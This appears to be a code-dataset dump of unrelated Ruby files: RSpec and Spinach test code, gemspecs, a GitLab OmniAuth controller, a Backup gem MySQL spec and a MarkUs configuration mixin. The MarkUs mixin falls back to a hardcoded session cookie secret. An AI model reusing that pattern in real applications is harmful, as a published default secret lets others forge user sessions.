hexsha (string, length 40-40) | size (int64, 2-1.01M) | content (string, length 2-1.01M) | avg_line_length (float64, 1.5-100) | max_line_length (int64, 2-1k) | alphanum_fraction (float64, 0.25-1) |
---|---|---|---|---|---|
4a6ba53a2c045f078f6a567ba5eb7a7bce15738c | 659 | # frozen_string_literal: true
require 'simplecov'
SimpleCov.start
require 'bundler/setup'
require 'smart_parser'
require 'factory_bot'
RSpec.configure do |config|
config.include FactoryBot::Syntax::Methods
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
config.before(:suite) do
FactoryBot.find_definitions
end
end
def random_ipv4
[rand(1..204), rand(10..20), rand(1..10), rand(0..255)].join('.')
end
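
# For illustration only: random_ipv4 joins one value from each range above into a
# dotted quad, e.g. "187.14.3.201" (the exact digits are random on every call).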
| 21.258065 | 67 | 0.738998 |
bbd284b4633069b174d25095048542a29c863004 | 2,992 | class Spinach::Features::AwardEmoji < Spinach::FeatureSteps
include SharedAuthentication
include SharedProject
include SharedPaths
include Select2Helper
step 'I visit "Bugfix" issue page' do
visit project_issue_path(@project, @issue)
end
step 'I click the thumbsup award Emoji' do
page.within '.awards' do
thumbsup = page.first('.award-control')
thumbsup.click
thumbsup.hover
end
end
step 'I click to emoji-picker' do
page.within '.awards' do
page.find('.js-add-award').click
end
end
step 'I click to emoji in the picker' do
page.within '.emoji-menu-content' do
emoji_button = page.first('.js-emoji-btn')
emoji_button.hover
emoji_button.click
end
end
step 'I can remove it by clicking to icon' do
page.within '.awards' do
expect do
page.find('.js-emoji-btn.active').click
wait_for_requests
end.to change { page.all(".award-control.js-emoji-btn").size }.from(3).to(2)
end
end
step 'I can see the activity and food categories' do
page.within '.emoji-menu' do
expect(page).not_to have_selector 'Activity'
expect(page).not_to have_selector 'Food'
end
end
step 'I have new comment with emoji added' do
expect(page).to have_selector 'gl-emoji[data-name="smile"]'
end
step 'I have award added' do
page.within '.awards' do
expect(page).to have_selector '.js-emoji-btn'
expect(page.find('.js-emoji-btn.active .js-counter')).to have_content '1'
expect(page).to have_css(".js-emoji-btn.active[data-original-title='You']")
end
end
step 'I have no awards added' do
page.within '.awards' do
expect(page).to have_selector '.award-control.js-emoji-btn'
expect(page.all('.award-control.js-emoji-btn').size).to eq(2)
# Check tooltip data
page.all('.award-control.js-emoji-btn').each do |element|
expect(element['title']).to eq("")
end
page.all('.award-control .js-counter').each do |element|
expect(element).to have_content '0'
end
end
end
step 'project "Shop" has issue "Bugfix"' do
@project = Project.find_by(name: 'Shop')
@issue = create(:issue, title: 'Bugfix', project: project)
end
step 'I leave comment with a single emoji' do
page.within('.js-main-target-form') do
fill_in 'note[note]', with: ':smile:'
click_button 'Comment'
end
end
step 'I search "hand"' do
fill_in 'emoji-menu-search', with: 'hand'
end
step 'I see search result for "hand"' do
page.within '.emoji-menu-content' do
expect(page).to have_selector '[data-name="raised_hand"]'
end
end
step 'The emoji menu is visible' do
page.find(".emoji-menu.is-visible")
end
step 'The search field is focused' do
expect(page).to have_selector('.js-emoji-menu-search')
expect(page.evaluate_script("document.activeElement.classList.contains('js-emoji-menu-search')")).to eq(true)
end
end
| 27.703704 | 113 | 0.660094 |
7943ea1dd76fe09e8bc1f328ad7409370ffb5d53 | 129 | class ApplicationController < ActionController::API
include ActionController::HttpAuthentication::Token::ControllerMethods
end
| 32.25 | 72 | 0.860465 |
f8e758b36cf1e1795ae073392cbef34c0132a271 | 482 | # frozen_string_literal: true
require 'spec_helper'
describe Nocode::StepRegistry do
subject(:registry) { described_class.instance }
context 'when file is in the root steps folder' do
it 'returns class constant' do
expect(registry.constant!('sleep')).to eq(Nocode::Steps::Sleep)
end
end
context 'when file is in a subfolder' do
it 'returns class constant' do
expect(registry.constant!('io/read')).to eq(Nocode::Steps::Io::Read)
end
end
end
| 24.1 | 74 | 0.701245 |
1cd165ab36d5407b2f605b578dd2c9ceb0e7e3d4 | 10,268 | # ApplicationRecord mixin to configure MarkUs
# All descendants have the following methods available
module MarkusConfigurator
######################################
# Repository configuration
######################################
def markus_config_repository_admin?
if defined? IS_REPOSITORY_ADMIN
return IS_REPOSITORY_ADMIN
else
#If not defined, default to true
return true
end
end
def markus_config_repository_storage
if defined? REPOSITORY_STORAGE
return REPOSITORY_STORAGE
else
return File.join(::Rails.root.to_s, "repositories")
end
end
def markus_config_repository_hooks
if (defined? REPOSITORY_HOOKS) && markus_config_repository_type == 'git'
REPOSITORY_HOOKS
else
{}
end
end
def markus_config_repository_client_hooks
if (defined? REPOSITORY_CLIENT_HOOKS) && markus_config_repository_type == 'git'
REPOSITORY_CLIENT_HOOKS
else
''
end
end
def markus_config_pdf_conv_memory_allowance
if defined? PDF_CONV_MEMORY_ALLOWANCE
return PDF_CONV_MEMORY_ALLOWANCE
else
return 100
end
end
def markus_config_max_file_size
if defined? MAX_FILE_SIZE
return MAX_FILE_SIZE
else
return 5000000
end
end
def markus_config_repository_type
if defined? REPOSITORY_TYPE
return REPOSITORY_TYPE
else
return 'git'
end
end
def markus_config_repository_external_base_url
if defined? REPOSITORY_EXTERNAL_BASE_URL
return REPOSITORY_EXTERNAL_BASE_URL
else
return 'http://www.example.com/git'
end
end
def markus_config_repository_external_submits_only?
case markus_config_repository_type
when "svn"
if defined? REPOSITORY_EXTERNAL_SUBMITS_ONLY
retval = REPOSITORY_EXTERNAL_SUBMITS_ONLY
else
retval = false
end
else
retval = false
end
return retval
end
def markus_config_repository_permission_file
if defined? REPOSITORY_PERMISSION_FILE
return REPOSITORY_PERMISSION_FILE
else
return File.join(markus_config_repository_storage, 'git_auth')
end
end
def markus_config_course_name
if defined? COURSE_NAME
return COURSE_NAME
else
return "CSC199: Example Course Name"
end
end
def markus_config_logout_redirect
if defined? LOGOUT_REDIRECT
return LOGOUT_REDIRECT
else
return "DEFAULT"
end
end
def markus_config_remote_user_auth
if defined? REMOTE_USER_AUTH
return REMOTE_USER_AUTH
else
return false
end
end
def markus_config_validate_user_message
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
return VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
return nil
end
end
def markus_config_validate_login_message
if defined? VALIDATE_LOGIN_INCORRECT_DISPLAY
return VALIDATE_LOGIN_INCORRECT_DISPLAY
else
return nil
end
end
###########################################
# Markus Session cookie configuration
###########################################
def markus_config_session_cookie_name
if defined? SESSION_COOKIE_NAME
return SESSION_COOKIE_NAME
else
return '_markus_session'
end
end
def markus_config_session_cookie_secret
if defined? SESSION_COOKIE_SECRET
return SESSION_COOKIE_SECRET
else
return '650d281667d8011a3a6ad6dd4b5d4f9ddbce14a7d78b107812dbb40b24e234256ab2c5572c8196cf6cde6b85942688b6bfd337ffa0daee648d04e1674cf1fdf6'
end
end
def markus_config_session_cookie_expire_after
if defined? SESSION_COOKIE_EXPIRE_AFTER
return SESSION_COOKIE_EXPIRE_AFTER
else
return 3.weeks
end
end
def markus_config_session_cookie_http_only
if defined? SESSION_COOKIE_HTTP_ONLY
return SESSION_COOKIE_HTTP_ONLY
else
return true
end
end
def markus_config_session_cookie_secure
if defined? SESSION_COOKIE_SECURE
return SESSION_COOKIE_SECURE
else
return false
end
end
######################################
# MarkusLogger configuration
######################################
def markus_config_logging_enabled?
if defined? MARKUS_LOGGING_ENABLED
return MARKUS_LOGGING_ENABLED
else
#If not defined, default to true
return true
end
end
def markus_config_validate_file
if defined? VALIDATE_FILE
return VALIDATE_FILE
else
return "#{::Rails.root.to_s}/config/dummy_validate.sh"
end
end
def markus_config_validate_ip?
if defined? VALIDATE_IP
return VALIDATE_IP
else
return false
end
end
def markus_config_logging_rotate_by_interval
if defined? MARKUS_LOGGING_ROTATE_BY_INTERVAL
return MARKUS_LOGGING_ROTATE_BY_INTERVAL
else
return false
end
end
def markus_config_logging_size_threshold
if defined? MARKUS_LOGGING_SIZE_THRESHOLD
return MARKUS_LOGGING_SIZE_THRESHOLD
else
return (1024 * 10**6)
end
end
def markus_config_logging_rotate_interval
if defined? MARKUS_LOGGING_ROTATE_INTERVAL
return MARKUS_LOGGING_ROTATE_INTERVAL
else
return 'daily'
end
end
def markus_config_logging_logfile
if defined? MARKUS_LOGGING_LOGFILE
return MARKUS_LOGGING_LOGFILE
else
return File.join(::Rails.root.to_s, "log", "#{::Rails.env}_info.log")
end
end
def markus_config_logging_errorlogfile
if defined? MARKUS_LOGGING_ERRORLOGFILE
return MARKUS_LOGGING_ERRORLOGFILE
else
return File.join(::Rails.root.to_s, "log", "#{::Rails.env}_error.log")
end
end
def markus_config_logging_num_oldfiles
if defined? MARKUS_LOGGING_OLDFILES
return MARKUS_LOGGING_OLDFILES
else
return 10
end
end
def markus_config_default_language
if defined? MARKUS_DEFAULT_LANGUAGE
return MARKUS_DEFAULT_LANGUAGE
else
return 'en'
end
end
##########################################
# Automated Testing Engine Configuration
##########################################
def autotest_on?
(defined? AUTOTEST_ON) && AUTOTEST_ON == true
end
def autotest_student_tests_on?
if autotest_on? && (defined? AUTOTEST_STUDENT_TESTS_ON)
AUTOTEST_STUDENT_TESTS_ON
else
false
end
end
def autotest_student_tests_buffer_time
if autotest_student_tests_on? && (defined? AUTOTEST_STUDENT_TESTS_BUFFER_TIME)
AUTOTEST_STUDENT_TESTS_BUFFER_TIME
else
1.hour
end
end
def autotest_client_dir
if autotest_on? && (defined? AUTOTEST_CLIENT_DIR)
AUTOTEST_CLIENT_DIR
else
File.join(::Rails.root.to_s, 'autotest')
end
end
def autotest_server_host
if autotest_on? && (defined? AUTOTEST_SERVER_HOST)
AUTOTEST_SERVER_HOST
else
'localhost'
end
end
def autotest_server_username
if autotest_on? && (defined? AUTOTEST_SERVER_USERNAME)
AUTOTEST_SERVER_USERNAME
else
nil
end
end
def autotest_server_dir
if autotest_on? && (defined? AUTOTEST_SERVER_DIR)
AUTOTEST_SERVER_DIR
else
File.join(::Rails.root.to_s, 'autotest', 'server')
end
end
def autotest_server_command
if autotest_on? && (defined? AUTOTEST_SERVER_COMMAND)
AUTOTEST_SERVER_COMMAND
else
'enqueuer'
end
end
def autotest_run_queue
if autotest_on? && (defined? AUTOTEST_RUN_QUEUE)
AUTOTEST_RUN_QUEUE
else
'autotest_run'
end
end
def autotest_cancel_queue
if autotest_on? && (defined? AUTOTEST_CANCEL_QUEUE)
AUTOTEST_CANCEL_QUEUE
else
'autotest_cancel'
end
end
def autotest_scripts_queue
if autotest_on? && (defined? AUTOTEST_SCRIPTS_QUEUE)
AUTOTEST_SCRIPTS_QUEUE
else
'autotest_scripts'
end
end
###################################################################
# Starter code configuration
###################################################################
# Global flag to enable/disable starter code feature.
def markus_starter_code_on
if defined? EXPERIMENTAL_STARTER_CODE_ON
EXPERIMENTAL_STARTER_CODE_ON
else
false
end
end
###################################################################
# Exam Plugin configuration
###################################################################
# Global flag to enable/disable all exam plugin features.
def markus_exam_plugin_on
if defined? EXPERIMENTAL_EXAM_PLUGIN_ON
EXPERIMENTAL_EXAM_PLUGIN_ON
else
false
end
end
def markus_exam_template_dir
if defined? EXAM_TEMPLATE_DIR
EXAM_TEMPLATE_DIR
else
File.join(::Rails.root.to_s, 'data', 'dev', 'exam_templates')
end
end
# Whether to allow the creation of scanned exams
def markus_experimental_scanned_exam_on?
if defined? EXPERIMENTAL_EXAM_PLUGIN_ON
EXPERIMENTAL_EXAM_PLUGIN_ON
else
false
end
end
##########################################
# Resque Configuration
##########################################
def markus_job_create_individual_groups_queue_name
if defined? JOB_CREATE_INDIVIDUAL_GROUPS_QUEUE_NAME
return JOB_CREATE_INDIVIDUAL_GROUPS_QUEUE_NAME
else
return 'job_groups'
end
end
def markus_job_collect_submissions_queue_name
if defined? JOB_COLLECT_SUBMISSIONS_QUEUE_NAME
return JOB_COLLECT_SUBMISSIONS_QUEUE_NAME
else
return 'job_collect'
end
end
def markus_job_uncollect_submissions_queue_name
if defined? JOB_UNCOLLECT_SUBMISSIONS_QUEUE_NAME
return JOB_UNCOLLECT_SUBMISSIONS_QUEUE_NAME
else
return 'job_uncollect'
end
end
def markus_job_update_repo_required_files_queue_name
if defined? JOB_UPDATE_REPO_REQUIRED_FILES_QUEUE_NAME
return JOB_UPDATE_REPO_REQUIRED_FILES_QUEUE_NAME
else
return 'job_req_files'
end
end
def markus_job_generate_queue_name
if defined? JOB_GENERATE_QUEUE_NAME
return JOB_GENERATE_QUEUE_NAME
else
return 'job_generate'
end
end
def markus_job_split_pdf_queue_name
if defined? JOB_SPLIT_PDF_QUEUE_NAME
return JOB_SPLIT_PDF_QUEUE_NAME
else
return 'job_split_pdf'
end
end
end
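
# Illustrative usage sketch (not part of the module itself): any class that mixes
# this module in gains the markus_config_* readers, each of which falls back to a
# built-in default when the corresponding constant is not defined by the
# environment configuration. The Assignment class below is hypothetical.
#
#   class Assignment < ApplicationRecord
#     include MarkusConfigurator
#   end
#
#   Assignment.new.markus_config_repository_type  # => 'git' unless REPOSITORY_TYPE is set
#   Assignment.new.markus_config_max_file_size    # => 5000000 unless MAX_FILE_SIZE is set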
| 23.074157 | 143 | 0.6791 |
9181334f0fca985d5c230dd88409a024dece2431 | 1,870 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "eyowo/version"
Gem::Specification.new do |spec|
spec.name = "eyowo"
spec.version = Eyowo::VERSION
spec.authors = ["Iyanu Adelekan"]
spec.email = ["[email protected]"]
spec.summary = "Ruby client for Eyowo API."
spec.description = "The official Ruby client library for interactions with the Eyowo API."
# spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_dependency "httparty", "~> 0.17.0"
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 41.555556 | 96 | 0.671123 |
795d9f001207ff7bd8d521c8221251a73493c630 | 656 | # frozen_string_literal: true
name 'ama-linux-user-management'
maintainer 'AMA Team'
maintainer_email '[email protected]'
source_url 'https://github.com/ama-team/cookbook-linux-user-management'
issues_url 'https://github.com/ama-team/cookbook-linux-user-management/issues'
license 'MIT'
description 'Installs/Configures ama-linux-user-management'
long_description 'Installs/Configures ama-linux-user-management'
chef_version '>= 12', '< 14'
version '0.1.0'
depends 'ssh_authorized_keys', '~> 0.3.0'
depends 'sudo', '~> 3.5.0'
depends 'ssh', '~> 0.10.22'
depends 'ama-ssh-private-keys', '~> 0.2.0'
supports 'debian', '>= 7.3'
supports 'ubuntu', '>= 14.04'
| 31.238095 | 78 | 0.733232 |
6226985eb9234959bd5a64ab80b347bb49d490c0 | 11,646 | # encoding: utf-8
require File.expand_path('../../spec_helper.rb', __FILE__)
module Backup
describe Database::MySQL do
let(:model) { Model.new(:test_trigger, 'test label') }
let(:db) { Database::MySQL.new(model) }
let(:s) { sequence '' }
before do
Database::MySQL.any_instance.stubs(:utility).
with(:mysqldump).returns('mysqldump')
Database::MySQL.any_instance.stubs(:utility).
with(:cat).returns('cat')
end
it_behaves_like 'a class that includes Configuration::Helpers'
it_behaves_like 'a subclass of Database::Base'
describe '#initialize' do
it 'provides default values' do
expect( db.database_id ).to be_nil
expect( db.name ).to be :all
expect( db.username ).to be_nil
expect( db.password ).to be_nil
expect( db.host ).to be_nil
expect( db.port ).to be_nil
expect( db.socket ).to be_nil
expect( db.skip_tables ).to be_nil
expect( db.only_tables ).to be_nil
expect( db.additional_options ).to be_nil
end
it 'configures the database' do
db = Database::MySQL.new(model, :my_id) do |mysql|
mysql.name = 'my_name'
mysql.username = 'my_username'
mysql.password = 'my_password'
mysql.host = 'my_host'
mysql.port = 'my_port'
mysql.socket = 'my_socket'
mysql.skip_tables = 'my_skip_tables'
mysql.only_tables = 'my_only_tables'
mysql.additional_options = 'my_additional_options'
end
expect( db.database_id ).to eq 'my_id'
expect( db.name ).to eq 'my_name'
expect( db.username ).to eq 'my_username'
expect( db.password ).to eq 'my_password'
expect( db.host ).to eq 'my_host'
expect( db.port ).to eq 'my_port'
expect( db.socket ).to eq 'my_socket'
expect( db.skip_tables ).to eq 'my_skip_tables'
expect( db.only_tables ).to eq 'my_only_tables'
expect( db.additional_options ).to eq 'my_additional_options'
end
end # describe '#initialize'
describe '#perform!' do
let(:pipeline) { mock }
let(:compressor) { mock }
before do
db.stubs(:mysqldump).returns('mysqldump_command')
db.stubs(:dump_path).returns('/tmp/trigger/databases')
db.expects(:log!).in_sequence(s).with(:started)
db.expects(:prepare!).in_sequence(s)
end
context 'without a compressor' do
it 'packages the dump without compression' do
Pipeline.expects(:new).in_sequence(s).returns(pipeline)
pipeline.expects(:<<).in_sequence(s).with('mysqldump_command')
pipeline.expects(:<<).in_sequence(s).with(
"cat > '/tmp/trigger/databases/MySQL.sql'"
)
pipeline.expects(:run).in_sequence(s)
pipeline.expects(:success?).in_sequence(s).returns(true)
db.expects(:log!).in_sequence(s).with(:finished)
db.perform!
end
end # context 'without a compressor'
context 'with a compressor' do
before do
model.stubs(:compressor).returns(compressor)
compressor.stubs(:compress_with).yields('cmp_cmd', '.cmp_ext')
end
it 'packages the dump with compression' do
Pipeline.expects(:new).in_sequence(s).returns(pipeline)
pipeline.expects(:<<).in_sequence(s).with('mysqldump_command')
pipeline.expects(:<<).in_sequence(s).with('cmp_cmd')
pipeline.expects(:<<).in_sequence(s).with(
"cat > '/tmp/trigger/databases/MySQL.sql.cmp_ext'"
)
pipeline.expects(:run).in_sequence(s)
pipeline.expects(:success?).in_sequence(s).returns(true)
db.expects(:log!).in_sequence(s).with(:finished)
db.perform!
end
end # context 'without a compressor'
context 'when the pipeline fails' do
before do
Pipeline.any_instance.stubs(:success?).returns(false)
Pipeline.any_instance.stubs(:error_messages).returns('error messages')
end
it 'raises an error' do
expect do
db.perform!
end.to raise_error(Database::MySQL::Error) {|err|
expect( err.message ).to eq(
"Database::MySQL::Error: Dump Failed!\n error messages"
)
}
end
end # context 'when the pipeline fails'
end # describe '#perform!'
describe '#mysqldump' do
let(:option_methods) {%w[
credential_options connectivity_options user_options
name_option tables_to_dump tables_to_skip
]}
it 'returns full mysqldump command built from all options' do
option_methods.each {|name| db.stubs(name).returns(name) }
expect( db.send(:mysqldump) ).to eq(
"mysqldump #{ option_methods.join(' ') }"
)
end
it 'handles nil values from option methods' do
option_methods.each {|name| db.stubs(name).returns(nil) }
expect( db.send(:mysqldump) ).to eq(
"mysqldump #{ ' ' * (option_methods.count - 1) }"
)
end
end # describe '#mysqldump'
describe 'mysqldump option methods' do
describe '#credential_options' do
it 'returns the credentials arguments' do
expect( db.send(:credential_options) ).to eq ''
db.username = 'my_user'
expect( db.send(:credential_options) ).to eq(
"--user='my_user'"
)
db.password = 'my_password'
expect( db.send(:credential_options) ).to eq(
"--user='my_user' --password='my_password'"
)
db.username = nil
expect( db.send(:credential_options) ).to eq(
"--password='my_password'"
)
end
end # describe '#credential_options'
describe '#connectivity_options' do
it 'returns only the socket argument if #socket specified' do
db.host = 'my_host'
db.port = 'my_port'
db.socket = 'my_socket'
expect( db.send(:connectivity_options) ).to eq(
"--socket='my_socket'"
)
end
it 'returns host and port arguments if specified' do
expect( db.send(:connectivity_options) ).to eq ''
db.host = 'my_host'
expect( db.send(:connectivity_options) ).to eq(
"--host='my_host'"
)
db.port = 'my_port'
expect( db.send(:connectivity_options) ).to eq(
"--host='my_host' --port='my_port'"
)
db.host = nil
expect( db.send(:connectivity_options) ).to eq(
"--port='my_port'"
)
end
end # describe '#connectivity_options'
describe '#user_options' do
it 'returns arguments for any #additional_options specified' do
expect( db.send(:user_options) ).to eq ''
db.additional_options = ['--opt1', '--opt2']
expect( db.send(:user_options) ).to eq '--opt1 --opt2'
db.additional_options = '--opta --optb'
expect( db.send(:user_options) ).to eq '--opta --optb'
end
end # describe '#user_options'
describe '#name_option' do
it 'returns argument to dump all databases if name is :all' do
expect( db.send(:name_option) ).to eq '--all-databases'
end
it 'returns the database name if name is not :all' do
db.name = 'my_db'
expect( db.send(:name_option) ).to eq 'my_db'
end
end # describe '#name_option'
describe '#tables_to_dump' do
it 'returns nil if dumping all databases' do
db.only_tables = 'will be ignored'
expect( db.send(:tables_to_dump) ).to be_nil
end
it 'returns arguments for only_tables' do
db.name = 'not_all'
db.only_tables = ['one', 'two', 'three']
expect( db.send(:tables_to_dump) ).to eq 'one two three'
db.only_tables = 'four five six'
expect( db.send(:tables_to_dump) ).to eq 'four five six'
end
end # describe '#tables_to_dump'
describe '#tables_to_skip' do
specify 'when no #skip_tables are specified' do
expect( db.send(:tables_to_skip) ).to eq ''
end
context 'when dumping all databases' do
it 'returns arguments for all tables given, as given' do
db.skip_tables = ['my_db.my_table', 'foo']
# Note that mysqldump will exit(1) if these don't include the db name.
expect( db.send(:tables_to_skip) ).to eq(
"--ignore-table='my_db.my_table' --ignore-table='foo'"
)
end
end
context 'when a database name is specified' do
it 'will add the database name prefix if missing' do
db.name = 'my_db'
db.skip_tables = ['my_table', 'foo.bar']
expect( db.send(:tables_to_skip) ).to eq(
"--ignore-table='my_db.my_table' --ignore-table='foo.bar'"
)
end
end
end # describe '#tables_to_skip'
end # describe 'mysqldump option methods'
describe 'deprecations' do
describe '#utility_path' do
before do
# to satisfy Utilities.configure
File.stubs(:executable?).with('/foo').returns(true)
Logger.expects(:warn).with {|err|
expect( err ).to be_an_instance_of Configuration::Error
expect( err.message ).to match(
/Use Backup::Utilities\.configure instead/
)
}
end
after do
Database::MySQL.clear_defaults!
end
context 'when set directly' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.new(model) do |db|
db.utility_path = '/foo'
end
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
context 'when set as a default' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.defaults do |db|
db.utility_path = '/foo'
end
Database::MySQL.new(model)
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
end # describe '#utility_path'
describe '#mysqldump_utility' do
before do
# to satisfy Utilities.configure
File.stubs(:executable?).with('/foo').returns(true)
Logger.expects(:warn).with {|err|
expect( err ).to be_an_instance_of Configuration::Error
expect( err.message ).to match(
/Use Backup::Utilities\.configure instead/
)
}
end
after do
Database::MySQL.clear_defaults!
end
context 'when set directly' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.new(model) do |db|
db.mysqldump_utility = '/foo'
end
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
context 'when set as a default' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.defaults do |db|
db.mysqldump_utility = '/foo'
end
Database::MySQL.new(model)
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
end # describe '#mysqldump_utility'
end # describe 'deprecations'
end
end
| 32.260388 | 80 | 0.593509 |
4a719ebdbd61d98695f57f591cf71722a2b20bd2 | 4,894 | class OmniauthCallbacksController < Devise::OmniauthCallbacksController
include AuthenticatesWithTwoFactor
protect_from_forgery except: [:kerberos, :saml, :cas3]
Gitlab.config.omniauth.providers.each do |provider|
define_method provider['name'] do
handle_omniauth
end
end
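# For illustration: if the instance is configured with, say, a 'google_oauth2'
# provider, the loop above defines a #google_oauth2 action that simply delegates
# to handle_omniauth (the provider name here is hypothetical).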
# Extend the standard message generation to accept our custom exception
def failure_message
exception = env["omniauth.error"]
error = exception.error_reason if exception.respond_to?(:error_reason)
error ||= exception.error if exception.respond_to?(:error)
error ||= exception.message if exception.respond_to?(:message)
error ||= env["omniauth.error.type"].to_s
error.to_s.humanize if error
end
# We only find ourselves here
# if the authentication to LDAP was successful.
def ldap
ldap_user = Gitlab::LDAP::User.new(oauth)
ldap_user.save if ldap_user.changed? # will also save new users
@user = ldap_user.gl_user
@user.remember_me = params[:remember_me] if ldap_user.persisted?
# Do additional LDAP checks for the user filter and EE features
if ldap_user.allowed?
if @user.two_factor_enabled?
prompt_for_two_factor(@user)
else
log_audit_event(@user, with: :ldap)
sign_in_and_redirect(@user)
end
else
flash[:alert] = "Access denied for your LDAP account."
redirect_to new_user_session_path
end
end
def saml
if current_user
log_audit_event(current_user, with: :saml)
# Update SAML identity if data has changed.
identity = current_user.identities.find_by(extern_uid: oauth['uid'], provider: :saml)
if identity.nil?
current_user.identities.create(extern_uid: oauth['uid'], provider: :saml)
redirect_to profile_account_path, notice: 'Authentication method updated'
else
redirect_to after_sign_in_path_for(current_user)
end
else
saml_user = Gitlab::Saml::User.new(oauth)
saml_user.save if saml_user.changed?
@user = saml_user.gl_user
continue_login_process
end
rescue Gitlab::OAuth::SignupDisabledError
handle_signup_error
end
def omniauth_error
@provider = params[:provider]
@error = params[:error]
render 'errors/omniauth_error', layout: "errors", status: 422
end
def cas3
ticket = params['ticket']
if ticket
handle_service_ticket oauth['provider'], ticket
end
handle_omniauth
end
def kerberos_spnego
# The internal kerberos_spnego provider is a replacement for
# omniauth-kerberos. Here we re-use the 'kerberos' provider name to ease
# the transition. In time (in GitLab 9.0?) we should remove the
# omniauth-kerberos gem and rename the internal 'kerberos_spnego'
# provider to plain 'kerberos' and remove this special method.
oauth['provider'] = 'kerberos'
handle_omniauth
end
def authentiq
if params['sid']
handle_service_ticket oauth['provider'], params['sid']
end
handle_omniauth
end
private
def handle_omniauth
if current_user
# Add new authentication method
current_user.identities.find_or_create_by(extern_uid: oauth['uid'], provider: oauth['provider'])
log_audit_event(current_user, with: oauth['provider'])
redirect_to profile_account_path, notice: 'Authentication method updated'
else
oauth_user = Gitlab::OAuth::User.new(oauth)
oauth_user.save
@user = oauth_user.gl_user
continue_login_process
end
rescue Gitlab::OAuth::SignupDisabledError
handle_signup_error
end
def handle_service_ticket(provider, ticket)
Gitlab::OAuth::Session.create provider, ticket
session[:service_tickets] ||= {}
session[:service_tickets][provider] = ticket
end
def continue_login_process
# Only allow properly saved users to login.
if @user.persisted? && @user.valid?
log_audit_event(@user, with: oauth['provider'])
if @user.two_factor_enabled?
prompt_for_two_factor(@user)
else
sign_in_and_redirect(@user)
end
else
error_message = @user.errors.full_messages.to_sentence
return redirect_to omniauth_error_path(oauth['provider'], error: error_message)
end
end
def handle_signup_error
label = Gitlab::OAuth::Provider.label_for(oauth['provider'])
message = "Signing in using your #{label} account without a pre-existing GitLab account is not allowed."
if current_application_settings.signup_enabled?
message << " Create a GitLab account first, and then connect it to your #{label} account."
end
flash[:notice] = message
redirect_to new_user_session_path
end
def oauth
@oauth ||= request.env['omniauth.auth']
end
def log_audit_event(user, options = {})
AuditEventService.new(user, user, options).
for_authentication.security_event
end
end
| 30.209877 | 108 | 0.706171 |
e83da830935722dc388af3116d889639257359e1 | 1,754 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Toggling the resolve status of a discussion' do
include GraphqlHelpers
let_it_be(:project) { create(:project, :public, :repository) }
let_it_be(:noteable) { create(:merge_request, source_project: project) }
let(:discussion) do
create(:diff_note_on_merge_request, noteable: noteable, project: project).to_discussion
end
let(:mutation) do
graphql_mutation(:discussion_toggle_resolve, { id: discussion.to_global_id.to_s, resolve: true })
end
let(:mutation_response) { graphql_mutation_response(:discussion_toggle_resolve) }
context 'when the user does not have permission' do
let_it_be(:current_user) { create(:user) }
it_behaves_like 'a mutation that returns top-level errors',
errors: ["The resource that you are attempting to access does not exist or you don't have permission to perform this action"]
end
context 'when user has permission' do
let_it_be(:current_user) { create(:user, developer_projects: [project]) }
it 'returns the discussion without errors', :aggregate_failures do
post_graphql_mutation(mutation, current_user: current_user)
expect(response).to have_gitlab_http_status(:success)
expect(mutation_response).to include(
'discussion' => be_present,
'errors' => be_empty
)
end
context 'when an error is encountered' do
before do
allow_next_instance_of(::Discussions::ResolveService) do |service|
allow(service).to receive(:execute).and_raise(ActiveRecord::RecordNotSaved)
end
end
it_behaves_like 'a mutation that returns errors in the response',
errors: ['Discussion failed to be resolved']
end
end
end
| 35.08 | 131 | 0.7252 |
08b1f31b3c7a64acbcf1747133fdc2a1a1357a37 | 237 | class CreateComments < ActiveRecord::Migration[5.2]
def change
create_table :comments do |t|
t.text :content
t.belongs_to :user, index: true
t.belongs_to :gossip, index: true
t.timestamps
end
end
end
| 19.75 | 51 | 0.658228 |
1c53cee7611e1c92390e39546d3572491244ad34 | 199 | class CreateTags < ActiveRecord::Migration[5.1]
def change
create_table :tags do |t|
t.string :name
t.references :blog_post, foreign_key: true
t.timestamps
end
end
end
| 18.090909 | 48 | 0.663317 |
e99a9bc41fd325c52449db94303ca0e70625d2b1 | 1,165 | require 'ip'
require './lib/configuration/team'
module Themis
module Configuration
def self.network(&block)
network_dsl = NetworkDSL.new
network_dsl.instance_eval(&block)
@_network = network_dsl.network
end
def self.get_network
@_network
end
class Network
attr_accessor :internal, :other
